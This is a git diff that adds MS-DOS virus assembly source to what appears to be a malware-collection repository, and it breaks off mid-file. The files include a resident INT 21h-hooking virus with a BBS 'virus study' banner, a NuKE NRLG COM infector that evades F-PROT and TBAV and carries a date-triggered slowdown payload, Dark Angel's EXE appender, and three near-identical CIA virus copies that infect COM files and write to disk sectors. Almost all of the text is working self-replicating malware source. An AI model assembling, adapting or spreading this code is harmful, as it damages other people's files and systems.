Sure exec (- Maybe data) + ; 4 = EXE-file (- COM) + +Org_Fl_Len_Lo dw (?) +Org_Fl_Len_Hi dw (?) + +Org_Fl_Time dw (?) +Org_Fl_Date dw (?) + +Save_Ax dw (?) +Save_Bx dw (?) +Save_Cx dw (?) +Save_Dx dw (?) +Save_Si dw (?) +Save_Di dw (?) +Save_Ds dw (?) +Save_Es dw (?) + +Save_A_Reg dw (?) + +Decoded: mov word ptr cs:[Save_A_Reg],ds + push ax + push bx + push cx + push dx + push ds + push es + + mov ah,45h + mov bx,0D15h + int 21h + cmp bx,0F0Ch + jne N_Y_Inst + jmp Jmp_No_Init +N_Y_Inst: cld + + xor ax,ax + mov ds,ax + + mov ax,[88h] ; Save I22 addr + mov cs:[Jmp_22+1],ax + mov ax,[8Ah] + mov cs:[Jmp_22+3],ax + + mov ax,[04Ch] ; Save I13 addr + mov cs:[Jmp_13+1],ax + mov dx,[04Eh] + mov cs:[Jmp_13+3],dx + + mov ah,52h + int 21h + cmp dx,es:[bx-2] + jnb Jmp_No_Init + + push [84h] + push [86h] + + push cs + pop ds + + push cs + pop es + + mov si,offset Com_First + mov di,offset Com_Start_2 + +MoveStrt: lodsw ; Other .COM start-up + cmp si,offset CodePars+3 + je No_MS_Lp + xchg ax,[di] + mov [si-2],ax + inc di + inc di +No_MS_Lp: cmp si,offset VirTitle + jb MoveStrt + + xor byte ptr [Init],1 + xor byte ptr [S_9],6Ch + xor byte ptr [Decode_Lp+2],1 + xor byte ptr [S_5],1 + xor byte ptr [S_6+1],1 + xor byte ptr [S_7],7 + xor byte ptr [S_8],6Ch ; Nop <> CLD + + mov ax,word ptr cs:[Save_A_Reg] + dec ax +MCB_Loop: mov ds,ax + cmp byte ptr [0],'Z' + je Found_End_MCB + add ax,[3] + inc ax + cmp ah,0A0h + jb MCB_Loop + add sp,4 +Jmp_No_Init: jmp short No_Init + +Found_End_MCB: mov bx,[3] +Here_Pars: sub bx,100h ; Filled in init-proc. + jc No_Init + mov [3],bx + add ax,bx + inc ax + mov ds,cs:[Save_A_Reg] + mov word ptr [2],ax + sub ax,10h + mov cx,offset End_Virus-100h + push cs + pop ds + mov es,ax + mov si,100h + mov di,si + repz movsb + + pop ds + pop si + + mov es:[Org_21_Addr],si + mov es:[Org_21_Addr+2],ds + + mov di,offset Org_21_Code + + call Move_Bytes + + cli + mov byte ptr [si-5],0EAh + mov word ptr [si-4],offset New_21 + mov word ptr [si-2],es + sti + + lds si,cs:[Jmp_22+1] + mov di,offset Org_22 + + call Move_Bytes + + lds si,cs:[Jmp_13+1] + mov di,offset Org_13 + + call Move_Bytes + +No_Init: pop es + pop ds + pop dx + pop cx + pop bx + pop ax + + test cs:Flags,4 + jnz Rest_Stack + + push ds + push cs + pop ds + mov cx,10h + mov si,offset Read_Buf + mov di,100h + repz movsb + pop ds + retf + +Rest_Stack: mov ax,ds ; Stack restore for .EXE files +Exe_SS: add ax,0 + add ax,10h + cli + mov ss,ax +Exe_SP: mov sp,0 + sti + mov ax,ds +Exe_Cs: add ax,0 + add ax,10h + push ax +Exe_Ip: mov ax,0 + push ax + retf + +Com_Start_2: mov di,100h + push cs + mov ax,cs + push di + db 05h ; Add Ax,xxxx + mov di,offset Init + push ax + push di + retf + +;*** INIT - ONLY DECODE - PART *** + +Init: mov si,offset Com_First +S_9: cld +Decode_Lp: xor byte ptr cs:[si],0 +S_5: inc si +S_6: cmp si,offset Init +S_7: jne Decode_Lp +S_8: nop + jmp Decoded + +Read_Buf db 0CDh,20h + db 16h dup (?) + +End_Virus: cld + mov word ptr [S_3+1],offset Init + mov word ptr [Here_Pars+2],(((offset End_Virus-101h) shr 4) +1) shl 1 + mov di,offset Coded +New_Us: mov si,offset User_St +B_V_CLp: lodsb + or al,al + jz New_Us + add [di],al + inc di + cmp di,offset No_Read + jb B_V_CLp + jmp Init + +User_St db 'users.bbs',0 + +;****************************************************************************; +; ; +; -=][][][][][][][][][][][][][][][=- ; +; -=] P E R F E C T C R I M E [=- ; +; -=] +31.(o)79.426o79 [=- ; +; -=] [=- ; +; -=] For All Your H/P/A/V Files [=- ; +; -=] SysOp: Peter Venkman [=- ; +; -=] [=- ; +; -=] +31.(o)79.426o79 [=- ; +; -=] P E R F E C T C R I M E [=- ; +; -=][][][][][][][][][][][][][][][=- ; +; ; +; *** NOT FOR GENERAL DISTRIBUTION *** ; +; ; +; This File is for the Purpose of Virus Study Only! It Should not be Passed ; +; Around Among the General Public. It Will be Very Useful for Learning how ; +; Viruses Work and Propagate. But Anybody With Access to an Assembler can ; +; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ; +; Experience can Turn it Into a far More Malevolent Program Than it Already ; +; Is. Keep This Code in Responsible Hands! ; +; ; +;****************************************************************************; + +;哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪; +;哪哪哪哪哪哪哪哪哪> and Remember Don't Forget to Call <哪哪哪哪哪哪哪哪哪; +;哪哪哪哪哪哪> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <哪哪哪哪哪; +;哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪; + diff --git a/MSDOS/Virus.MSDOS.Unknown.cheeser.asm b/MSDOS/Virus.MSDOS.Unknown.cheeser.asm new file mode 100644 index 00000000..9cf4b372 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.cheeser.asm @@ -0,0 +1,416 @@ +;谀哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪目 +; THiS iS a [NuKE] RaNDoMiC LiFe GeNeRaToR ViRuS. [NuKE] PoWeR +; CReaTeD iS a N.R.L.G. PRoGRaM V0.66 BeTa TeST VeRSioN [NuKE] WaReZ +; auToR: aLL [NuKE] MeMeBeRS [NuKE] PoWeR +; [NuKE] THe ReaL PoWeR! [NuKE] WaReZ +; NRLG WRiTTeR: AZRAEL (C) [NuKE] 1994 [NuKE] PoWeR +;滥哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪馁 + +.286 +code segment +assume cs:code,ds:code +org 100h + +start: CALL NEXT + +NEXT: + mov di,sp ;take the stack pointer location + mov bp,ss:[di] ;take the "DELTA HANDLE" for my virus + sub bp,offset next ;subtract the large code off this code + ; +;******************************************************************* +; #1 DECRYPT ROUTINE +;******************************************************************* + +cmp byte ptr cs:[crypt],0b9h ;is the first runnig? +je crypt2 ;yes! not decrypt +;---------------------------------------------------------- +mov cx,offset fin ;cx = large of virus +lea di,[offset crypt]+ bp ;di = first byte to decrypt +mov dx,1 ;dx = value for decrypt +;---------------------------------------------------------- +deci: ;deci = fuck label! +;---------------------------------------------------------- + +inc di +inc di +;---------------------------------------------------------- +jmp bye ;######## BYE BYE F-PROT ! ########## +mov ah,4ch +int 21h +bye: ;#### HEY FRIDRIK! IS ONLY A JMP!!### +;----------------------------------------------------------- +mov ah,0bh ;######### BYE BYE TBAV ! ########## +int 21h ;### (CANGE INT AT YOU PLEASURE) ### +;---------------------------------------------------------- +loop deci ;repeat please! + ; +;***************************************************************** +; #2 DECRYPT ROUTINE +;***************************************************************** + ; +crypt: ;fuck label! + ; +mov cx,offset fin ;cx = large of virus +lea di,[offset crypt2] + bp ;di = first byte to decrypt +;--------------------------------------------------------------- +deci2: ; +xor byte ptr cs:[di],1 ;decrytion rutine +inc di ;very simple... +loop deci2 ; +;--------------------------------------------------------------- +crypt2: ;fuck label! + ; +MOV AX,0CACAH ;call to my resident interrup mask +INT 21H ;for chek "I'm is residet?" +CMP Bh,0CAH ;is equal to CACA? +JE PUM2 ;yes! jump to runnig program +call action +;***************************************************************** +; NRLG FUNCTIONS (SELECTABLE) +;***************************************************************** + +;**************************************************************** +; PROCESS TO REMAIN RESIDENT +;**************************************************************** + +mov ax,3521h +int 21h ;store the int 21 vectors +mov word ptr [bp+int21],bx ;in cs:int21 +mov word ptr [bp+int21+2],es ; +;--------------------------------------------------------------- +push cs ; +pop ax ;ax = my actual segment +dec ax ;dec my segment for look my MCB +mov es,ax ; +mov bx,es:[3] ;read the #3 byte of my MCB =total used memory +;--------------------------------------------------------------- +push cs ; +pop es ; +sub bx,(offset fin - offset start + 15)/16 ;subtract the large of my virus +sub bx,17 + offset fin ;and 100H for the PSP total +mov ah,4ah ;used memory +int 21h ;put the new value to MCB +;--------------------------------------------------------------- +mov bx,(offset fin - offset start + 15)/16 + 16 + offset fin +mov ah,48h ; +int 21h ;request the memory to fuck DOS! +;--------------------------------------------------------------- +dec ax ;ax=new segment +mov es,ax ;ax-1= new segment MCB +mov byte ptr es:[1],8 ;put '8' in the segment +;-------------------------------------------------------------- +inc ax ; +mov es,ax ;es = new segment +lea si,[bp + offset start] ;si = start of virus +mov di,100h ;di = 100H (psp position) +mov cx,offset fin - start ;cx = lag of virus +push cs ; +pop ds ;ds = cs +cld ;mov the code +rep movsb ;ds:si >> es:di +;-------------------------------------------------------------- +mov dx,offset virus ;dx = new int21 handler +mov ax,2521h ; +push es ; +pop ds ; +int 21h ;set the vectors +;------------------------------------------------------------- +pum2: ; + ; +mov ah,byte ptr [cs:bp + real] ;restore the 3 +mov byte ptr cs:[100h],ah ;first bytes +mov ax,word ptr [cs:bp + real + 1] ; +mov word ptr cs:[101h],ax ; +;------------------------------------------------------------- +mov ax,100h ; +jmp ax ;jmp to execute + ; +;***************************************************************** +;* HANDLER FOR THE INT 21H +;***************************************************************** + ; +VIRUS: ; + ; +cmp ah,4bh ;is a 4b function? +je REPRODUCCION ;yes! jump to reproduce ! +cmp ah,11h +je dir +cmp ah,12h +je dir +dirsal: +cmp AX,0CACAH ;is ... a caca function? (resident chek) +jne a3 ;no! jump to a3 +mov bh,0cah ;yes! put ca in bh +a3: ; +JMP dword ptr CS:[INT21] ;jmp to original int 21h +ret ; +make db '[NuKE] N.R.L.G. AZRAEL' +dir: +jmp dir_s +;------------------------------------------------------------- +REPRODUCCION: ; + ; +pushf ;put the register +pusha ;in the stack +push si ; +push di ; +push bp ; +push es ; +push ds ; +;------------------------------------------------------------- +push cs ; +pop ds ; +mov ax,3524H ;get the dos error control +int 21h ;interupt +mov word ptr error,es ;and put in cs:error +mov word ptr error+2,bx ; +mov ax,2524H ;change the dos error control +mov dx,offset all ;for my "trap mask" +int 21h ; +;------------------------------------------------------------- +pop ds ; +pop es ;restore the registers +pop bp ; +pop di ; +pop si ; +popa ; +popf ; +;------------------------------------------------------------- +pushf ;put the registers +pusha ; +push si ;HEY! AZRAEL IS CRAZY? +push di ;PUSH, POP, PUSH, POP +push bp ;PLEEEEEAAAAAASEEEEEEEEE +push es ;PURIFY THIS SHIT! +push ds ; +;------------------------------------------------------------- +mov ax,4300h ; +int 21h ;get the file +mov word ptr cs:[attrib],cx ;atributes +;------------------------------------------------------------- +mov ax,4301h ;le saco los atributos al +xor cx,cx ;file +int 21h ; +;------------------------------------------------------------- +mov ax,3d02h ;open the file +int 21h ;for read/write +mov bx,ax ;bx=handle +;------------------------------------------------------------- +mov ax,5700h ; +int 21h ;get the file date +mov word ptr cs:[hora],cx ;put the hour +mov word ptr cs:[dia],dx ;put the day +and cx,word ptr cs:[fecha] ;calculate the seconds +cmp cx,word ptr cs:[fecha] ;is ecual to 58? (DEDICATE TO N-POX) +jne seguir ;yes! the file is infected! +jmp cerrar ; +;------------------------------------------------------------ +seguir: ; +mov ax,4202h ;move the pointer to end +call movedor ;of the file +;------------------------------------------------------------ +push cs ; +pop ds ; +sub ax,3 ;calculate the +mov word ptr [cs:largo],ax ;jmp long +;------------------------------------------------------------- +mov ax,04200h ;move the pointer to +call movedor ;start of file +;---------------------------------------------------------- +push cs ; +pop ds ;read the 3 first bytes +mov ah,3fh ; +mov cx,3 ; +lea dx,[cs:real] ;put the bytes in cs:[real] +int 21h ; +;---------------------------------------------------------- +cmp word ptr cs:[real],05a4dh ;the 2 first bytes = 'MZ' ? +jne er1 ;yes! is a EXE... fuckkk! +;---------------------------------------------------------- +jmp cerrar +er1: +;---------------------------------------------------------- +mov ax,4200h ;move the pointer +call movedor ;to start fo file +;---------------------------------------------------------- +push cs ; +pop ds ; +mov ah,40h ; +mov cx,1 ;write the JMP +lea dx,[cs:jump] ;instruccion in the +int 21h ;fist byte of the file +;---------------------------------------------------------- +mov ah,40h ;write the value of jmp +mov cx,2 ;in the file +lea dx,[cs:largo] ; +int 21h ; +;---------------------------------------------------------- +mov ax,04202h ;move the pointer to +call movedor ;end of file +;---------------------------------------------------------- +push cs ; +pop ds ;move the code +push cs ;of my virus +pop es ;to cs:end+50 +cld ;for encrypt +mov si,100h ; +mov di,offset fin + 50 ; +mov cx,offset fin - 100h ; +rep movsb ; +;---------------------------------------------------------- +mov cx,offset fin +mov di,offset fin + 50 + (offset crypt2 - offset start) ;virus +enc: ; +xor byte ptr cs:[di],1 ;encrypt the virus +inc di ;code +loop enc ; +;--------------------------------------------------------- +mov cx,offset fin +mov di,offset fin + 50 + (offset crypt - offset start) ;virus +mov dx,1 +enc2: ; + +inc di +inc di ;the virus code +loop enc2 ; +;-------------------------------------------- +mov ah,40h ; +mov cx,offset fin - offset start ;copy the virus +mov dx,offset fin + 50 ;to end of file +int 21h ; +;---------------------------------------------------------- +cerrar: ; + ;restore the +mov ax,5701h ;date and time +mov cx,word ptr cs:[hora] ;file +mov dx,word ptr cs:[dia] ; +or cx,word ptr cs:[fecha] ;and mark the seconds +int 21h ; +;---------------------------------------------------------- +mov ah,3eh ; +int 21h ;close the file +;---------------------------------------------------------- +pop ds ; +pop es ;restore the +pop bp ;registers +pop di ; +pop si ; +popa ; +popf ; +;---------------------------------------------------------- +pusha ; + ; +mov ax,4301h ;restores the atributes +mov cx,word ptr cs:[attrib] ;of the file +int 21h ; + ; +popa ; +;---------------------------------------------------------- +pushf ; +pusha ; 8-( = f-prot +push si ; +push di ; 8-( = tbav +push bp ; +push es ; 8-) = I'm +push ds ; +;---------------------------------------------------------- +mov ax,2524H ; +lea bx,error ;restore the +mov ds,bx ;errors handler +lea bx,error+2 ; +int 21h ; +;---------------------------------------------------------- +pop ds ; +pop es ; +pop bp ;restore the +pop di ;resgisters +pop si ; +popa ; +popf ; +;---------------------------------------------------------- +JMP A3 ;jmp to orig. INT 21 + ; +;********************************************************** +; SUBRUTINES AREA +;********************************************************** + ; +movedor: ; + ; +xor cx,cx ;use to move file pointer +xor dx,dx ; +int 21h ; +ret ; +;---------------------------------------------------------- +all: ; + ; +XOR AL,AL ;use to set +iret ;error flag + +;*********************************************************** +; DATA AREA +;*********************************************************** +largo dw ? +jump db 0e9h +real db 0cdh,20h,0 +hora dw ? +dia dw ? +attrib dw ? +int21 dd ? +error dd ? + +;--------------------------------- +action: ; +MOV AH,2AH ; +INT 21H ;get date +CMP Dl,byte ptr cs:[action_dia+bp] ;is equal to my day? +JE cont ;nop! fuck ret +cmp byte ptr cs:[action_dia+bp],32 ; +jne no_day ; +cont: ; +cmp dh,byte ptr cs:[action_mes+bp] ;is equal to my month? +je set ; +cmp byte ptr cs:[action_mes+bp],13 ; +jne NO_DAY ;nop! fuck ret +set: ; + +mov ax,351ch ; +int 21h ;store the int 1ch vectors +mov word ptr [trampaint+bp],bx ;in cs:trampaint +mov word ptr [trampaint+2+bp],es ; +mov ax,251ch ;put the int 1ch (clock) vector +push cs ; +pop ds ; +mov dx,offset tardar ;in offset tardar +int 21h ; +mov dx,offset fin ; +int 27h ;main resident the code +NO_DAY: ; +ret ;ret for program +tardar: ;int 1c handler +pushf ; +pusha ; +mov cx,0ffffh ;fuck loop for slow speed +trampa: ; +mov ax,ax ; +loop trampa ; +popa ; +popf ; +JMP dword ptr CS:[trampaint+bp] ;jmp to original int 1ch +ret ; +trampaint dd ? ; +;--------------------------------; + +;-------------; +Dir_S: ; +jmp dirsal ; +no_Good:iret ; +;-------------; + +action_dia Db 01H ;day for the action +action_mes Db 01H ;month for the action +FECHA DW 018H ;Secon for mark +FECHAd Db 018H ;Secon for mark dir st +fin: +code ends +end start diff --git a/MSDOS/Virus.MSDOS.Unknown.cheesy.asm b/MSDOS/Virus.MSDOS.Unknown.cheesy.asm new file mode 100644 index 00000000..013156a6 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.cheesy.asm @@ -0,0 +1,186 @@ + .model tiny ; Handy TASM directive + .code ; Virus code segment + org 100h ; COM file starting IP + ; Cheesy EXE infector + ; Written by Dark Angel of PHALCON/SKISM + ; For 40Hex Number 8 Volume 2 Issue 4 + id = 'DA' ; ID word for EXE infections + + startvirus: ; virus code starts here + call next ; calculate delta offset + next: pop bp ; bp = IP next + sub bp,offset next ; bp = delta offset + + push ds + push es + push cs ; DS = CS + pop ds + push cs ; ES = CS + pop es + lea si,[bp+jmpsave2] + lea di,[bp+jmpsave] + movsw + movsw + movsw + movsw + + mov ah,1Ah ; Set new DTA + lea dx,[bp+newDTA] ; new DTA @ DS:DX + int 21h + + lea dx,[bp+exe_mask] + mov ah,4eh ; find first file + mov cx,7 ; any attribute + findfirstnext: + int 21h ; DS:DX points to mask + jc done_infections ; No mo files found + + mov al,0h ; Open read only + call open + + mov ah,3fh ; Read file to buffer + lea dx,[bp+buffer] ; @ DS:DX + mov cx,1Ah ; 1Ah bytes + int 21h + + mov ah,3eh ; Close file + int 21h + + checkEXE: cmp word ptr [bp+buffer+10h],id ; is it already infected? + jnz infect_exe + find_next: + mov ah,4fh ; find next file + jmp short findfirstnext + done_infections: + mov ah,1ah ; restore DTA to default + mov dx,80h ; DTA in PSP + pop es + pop ds ; DS->PSP + int 21h + mov ax,es ; AX = PSP segment + add ax,10h ; Adjust for PSP + add word ptr cs:[si+jmpsave+2],ax + add ax,word ptr cs:[si+stacksave+2] + cli ; Clear intrpts for stack manip. + mov sp,word ptr cs:[si+stacksave] + mov ss,ax + sti + db 0eah ; jmp ssss:oooo + jmpsave dd ? ; Original CS:IP + stacksave dd ? ; Original SS:SP + jmpsave2 dd 0fff00000h ; Needed for carrier file + stacksave2 dd ? + + creator db '[MPC]',0,'Dark Angel of PHALCON/SKISM',0 + virusname db '[DemoEXE] for 40Hex',0 + + infect_exe: + les ax, dword ptr [bp+buffer+14h] ; Save old entry point + mov word ptr [bp+jmpsave2], ax + mov word ptr [bp+jmpsave2+2], es + + les ax, dword ptr [bp+buffer+0Eh] ; Save old stack + mov word ptr [bp+stacksave2], es + mov word ptr [bp+stacksave2+2], ax + + mov ax, word ptr [bp+buffer + 8] ; Get header size + mov cl, 4 ; convert to bytes + shl ax, cl + xchg ax, bx + + les ax, [bp+offset newDTA+26]; Get file size + mov dx, es ; to DX:AX + push ax + push dx + + sub ax, bx ; Subtract header size from + sbb dx, 0 ; file size + + mov cx, 10h ; Convert to segment:offset + div cx ; form + + mov word ptr [bp+buffer+14h], dx ; New entry point + mov word ptr [bp+buffer+16h], ax + + mov word ptr [bp+buffer+0Eh], ax ; and stack + mov word ptr [bp+buffer+10h], id + + pop dx ; get file length + pop ax + + add ax, heap-startvirus ; add virus size + adc dx, 0 + + mov cl, 9 ; 2**9 = 512 + push ax + shr ax, cl + ror dx, cl + stc + adc dx, ax ; filesize in pages + pop ax + and ah, 1 ; mod 512 + + mov word ptr [bp+buffer+4], dx ; new file size + mov word ptr [bp+buffer+2], ax + + push cs ; restore ES + pop es + + mov cx, 1ah + finishinfection: + push cx ; Save # bytes to write + xor cx,cx ; Clear attributes + call attributes ; Set file attributes + + mov al,2 + call open + + mov ah,40h ; Write to file + lea dx,[bp+buffer] ; Write from buffer + pop cx ; cx bytes + int 21h + + mov ax,4202h ; Move file pointer + xor cx,cx ; to end of file + cwd ; xor dx,dx + int 21h + + mov ah,40h ; Concatenate virus + lea dx,[bp+startvirus] + mov cx,heap-startvirus ; # bytes to write + int 21h + + mov ax,5701h ; Restore creation date/time + mov cx,word ptr [bp+newDTA+16h] ; time + mov dx,word ptr [bp+newDTA+18h] ; date + int 21h + + mov ah,3eh ; Close file + int 21h + + mov ch,0 + mov cl,byte ptr [bp+newDTA+15h] ; Restore original + call attributes ; attributes + + mo_infections: jmp find_next + + open: + mov ah,3dh + lea dx,[bp+newDTA+30] ; filename in DTA + int 21h + xchg ax,bx + ret + + attributes: + mov ax,4301h ; Set attributes to cx + lea dx,[bp+newDTA+30] ; filename in DTA + int 21h + ret + + exe_mask db '*.exe',0 + heap: ; Variables not in code + newDTA db 42 dup (?) ; Temporary DTA + buffer db 1ah dup (?) ; read buffer + endheap: ; End of virus + + end startvirus diff --git a/MSDOS/Virus.MSDOS.Unknown.cia.asm b/MSDOS/Virus.MSDOS.Unknown.cia.asm new file mode 100644 index 00000000..b2d0dc03 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.cia.asm @@ -0,0 +1,241 @@ + page 70,120 + Name CIAVIRUS +;************************************ +; CIA Virus (C) 1989 by +; Live Wire +;************************************ + + +code segment + assume cs:code +progr equ 100h + ORG progr + +main: + nop + nop + nop + mov ax,00 + mov es:[pointer],ax + mov es:[counter],ax + mov es:[disks],al + mov ah,19h + int 21h + mov cs:drive,al + mov ah,47h + mov dh,0 + add al,1 + mov dl,al + lea si,cs:old_path + int 21h + mov ah,0eh + mov dl,0 + int 21h + mov al,01 + cmp al,01 + jnz hups3 + mov al,06 + +hups3: mov ah,0 + lea bx,search_order + add bx,ax + add bx,0001h + mov cs:pointer,bx + clc + +change_disk: + jnc no_name_change + mov ah,17h + lea dx,cs:maske_exe + int 21h + cmp al,0ffh + jnz no_name_change + mov ah,2ch + int 21h + mov bx,cs:pointer + mov al,cs:[bx] + mov bx,dx + mov cx,2 + mov dh,0 + int 26h + +no_name_change: + mov bx,cs:pointer + dec bx + mov cs:pointer,bx + mov dl,cs:[bx] + cmp dl,0ffh + jnz hups2 + jmp hops + +hups2: + mov ah,0eh + int 21h + mov ah,3bh + lea dx,path + int 21h + jmp find_first_file + +find_first_subdir: + mov ah,17h + lea dx,cs:maske_exe + int 21h + mov ah,3bh + lea dx,path + int 21h + mov ah,04eh + mov cx,00010001b + lea dx,maske_exe + int 21h + jc change_disk + + mov bx,CS:counter + inc bx + dec bx + jz use_next_subdir + +find_next_subdir: + mov ah,4fh + int 21h + jc change_disk + dec bx + jnz find_next_subdir + +use_next_subdir: + mov ah,2fh + int 21h + add bx,1ch + mov es:[bx],'\ ' + inc bx + push ds + mov ax,es + mov ds,ax + mov dx,bx + mov ah,3bh + int 21h + pop ds + mov bx,cs:counter + inc bx + mov cs:counter,bx + +find_first_file: + mov ah,04eh + mov cx,00000001b + lea dx,maske_com + int 21h + jc find_first_subdir + jmp check_if_ill + +find_next_file: + mov ah,4fh + int 21h + jc find_first_subdir + +check_if_ill: + mov ah,3dh + mov al,02h + mov dx,9eh + int 21h + mov bx,ax + mov ah,3fh + mov cx,buflen + mov dx,buffer + int 21h + mov ah,3eh + int 21h + + mov bx,cs:[buffer] + cmp bx,9090h + jz find_next_file + + mov ah,43h + mov al,0 + mov dx,9eh + int 21h + mov ah,43h + mov al,01h + and cx,11111110b + int 21h + + mov ah,3dh + mov al,02h + mov dx,9eh + int 21h + + mov bx,ax + mov ah,57h + mov al,0 + int 21h + push cx + push dx + + mov dx,cs:[conta] + mov cs:[jmpbuf],dx + mov dx,cs:[buffer+1] + lea cx,cont-100h + sub dx,cx + mov cs:[conta],dx + + mov ah,40h + mov cx,buflen + lea dx,main + int 21h + + mov ah,57h + mov al,1 + pop dx + pop cx + int 21h + + mov ah,3eh + int 21h + + mov dx,cs:[jmpbuf] + mov cs:[conta],dx +hops: nop + call use_old + +cont db 0e9h +conta dw 0 + mov ah,00 + int 21h + +use_old: + mov ah,0eh + mov dl,cs:drive + int 21h + + mov ah,3bh + lea dx,old_path-1 + int 21h + ret + +search_order db 0ffh,1,0,2,3,0ffh,00,0ffh +pointer dw 0000 +counter dw 0000 +disks db 0 + + +maske_com db "*.com",00 +maske_dir db "*",00 +maske_exe db 0ffh,0,0,0,0,0,00111111b + db 0,"????????exe",0,0,0,0 + db 0,"????????com",0 +maske_all db 0ffh,0,0,0,0,0,00111111b + db 0,"???????????",0,0,0,0 + db 0,"????????com",0 + +buffer equ 0e000h + +buflen equ 230h +jmpbuf equ buffer+buflen +path db "\",0 +drive db 0 +back_slash db "\" +old_path db 32 dup (?) + +code ends + +end main + + diff --git a/MSDOS/Virus.MSDOS.Unknown.cia2.asm b/MSDOS/Virus.MSDOS.Unknown.cia2.asm new file mode 100644 index 00000000..9b8e7eb6 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.cia2.asm @@ -0,0 +1,247 @@ + page 70,120 + Name CIAVIRUS +;************************************ +; CIA Virus (C) 1989 by +; Live Wire +;************************************ + + +code segment + assume cs:code +progr equ 100h + ORG progr + +main: + nop + nop + nop + mov ax,00 + mov es:[pointer],ax + mov es:[counter],ax + mov es:[disks],al + mov ah,19h + int 21h + mov cs:drive,al + mov ah,47h + mov dh,0 + add al,1 + mov dl,al + lea si,cs:old_path + int 21h + mov ah,0eh + mov dl,0 + int 21h + mov al,01 + cmp al,01 + jnz hups3 + mov al,06 + +hups3: mov ah,0 + lea bx,search_order + add bx,ax + add bx,0001h + mov cs:pointer,bx + clc + +change_disk: + jnc no_name_change + mov ah,17h + lea dx,cs:maske_exe + int 21h + cmp al,0ffh + jnz no_name_change + mov ah,2ch + int 21h + mov bx,cs:pointer + mov al,cs:[bx] + mov bx,dx + mov cx,2 + mov dh,0 + int 26h + +no_name_change: + mov bx,cs:pointer + dec bx + mov cs:pointer,bx + mov dl,cs:[bx] + cmp dl,0ffh + jnz hups2 + jmp hops + +hups2: + mov ah,0eh + int 21h + mov ah,3bh + lea dx,path + int 21h + jmp find_first_file + +find_first_subdir: + mov ah,17h + lea dx,cs:maske_exe + int 21h + mov ah,3bh + lea dx,path + int 21h + mov ah,04eh + mov cx,00010001b + lea dx,maske_exe + int 21h + jc change_disk + + mov bx,CS:counter + inc bx + dec bx + jz use_next_subdir + +find_next_subdir: + mov ah,4fh + int 21h + jc change_disk + dec bx + jnz find_next_subdir + +use_next_subdir: + mov ah,2fh + int 21h + add bx,1ch + mov es:[bx],'\ ' + inc bx + push ds + mov ax,es + mov ds,ax + mov dx,bx + mov ah,3bh + int 21h + pop ds + mov bx,cs:counter + inc bx + mov cs:counter,bx + +find_first_file: + mov ah,04eh + mov cx,00000001b + lea dx,maske_com + int 21h + jc find_first_subdir + jmp check_if_ill + +find_next_file: + mov ah,4fh + int 21h + jc find_first_subdir + +check_if_ill: + mov ah,3dh + mov al,02h + mov dx,9eh + int 21h + mov bx,ax + mov ah,3fh + mov cx,buflen + mov dx,buffer + int 21h + mov ah,3eh + int 21h + + mov bx,cs:[buffer] + cmp bx,9090h + jz find_next_file + + mov ah,43h + mov al,0 + mov dx,9eh + int 21h + mov ah,43h + mov al,01h + and cx,11111110b + int 21h + + mov ah,3dh + mov al,02h + mov dx,9eh + int 21h + + mov bx,ax + mov ah,57h + mov al,0 + int 21h + push cx + push dx + + mov dx,cs:[conta] + mov cs:[jmpbuf],dx + mov dx,cs:[buffer+1] + lea cx,cont-100h + sub dx,cx + mov cs:[conta],dx + + mov ah,40h + mov cx,buflen + lea dx,main + int 21h + + mov ah,57h + mov al,1 + pop dx + pop cx + int 21h + + mov ah,3eh + int 21h + + mov dx,cs:[jmpbuf] + mov cs:[conta],dx +hops: nop + call use_old + +cont db 0e9h +conta dw 0 + mov ah,00 + int 21h + +use_old: + mov ah,0eh + mov dl,cs:drive + int 21h + + mov ah,3bh + lea dx,old_path-1 + int 21h + ret + +search_order db 0ffh,1,0,2,3,0ffh,00,0ffh +pointer dw 0000 +counter dw 0000 +disks db 0 + + +maske_com db "*.com",00 +maske_dir db "*",00 +maske_exe db 0ffh,0,0,0,0,0,00111111b + db 0,"????????exe",0,0,0,0 + db 0,"????????com",0 +maske_all db 0ffh,0,0,0,0,0,00111111b + db 0,"???????????",0,0,0,0 + db 0,"????????com",0 + +buffer equ 0e000h + +buflen equ 230h +jmpbuf equ buffer+buflen +path db "\",0 +drive db 0 +back_slash db "\" +old_path db 32 dup (?) + +code ends + +end main + + + +; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪 +; 哪哪哪哪哪哪哪哪哪哪> and Remember Don't Forget to Call <哪哪哪哪哪哪哪哪 +; 哪哪哪哪哪哪> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <哪哪哪哪哪 +; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪 + diff --git a/MSDOS/Virus.MSDOS.Unknown.ciavirus.asm b/MSDOS/Virus.MSDOS.Unknown.ciavirus.asm new file mode 100644 index 00000000..b42da67b --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.ciavirus.asm @@ -0,0 +1,239 @@ + page 70,120 + Name CIAVIRUS +;************************************ +; CIA Virus (C) 1989 by +; Live Wire +;************************************ + + +code segment + assume cs:code +progr equ 100h + ORG progr + +main: + nop + nop + nop + mov ax,00 + mov es:[pointer],ax + mov es:[counter],ax + mov es:[disks],al + mov ah,19h + int 21h + mov cs:drive,al + mov ah,47h + mov dh,0 + add al,1 + mov dl,al + lea si,cs:old_path + int 21h + mov ah,0eh + mov dl,0 + int 21h + mov al,01 + cmp al,01 + jnz hups3 + mov al,06 + +hups3: mov ah,0 + lea bx,search_order + add bx,ax + add bx,0001h + mov cs:pointer,bx + clc + +change_disk: + jnc no_name_change + mov ah,17h + lea dx,cs:maske_exe + int 21h + cmp 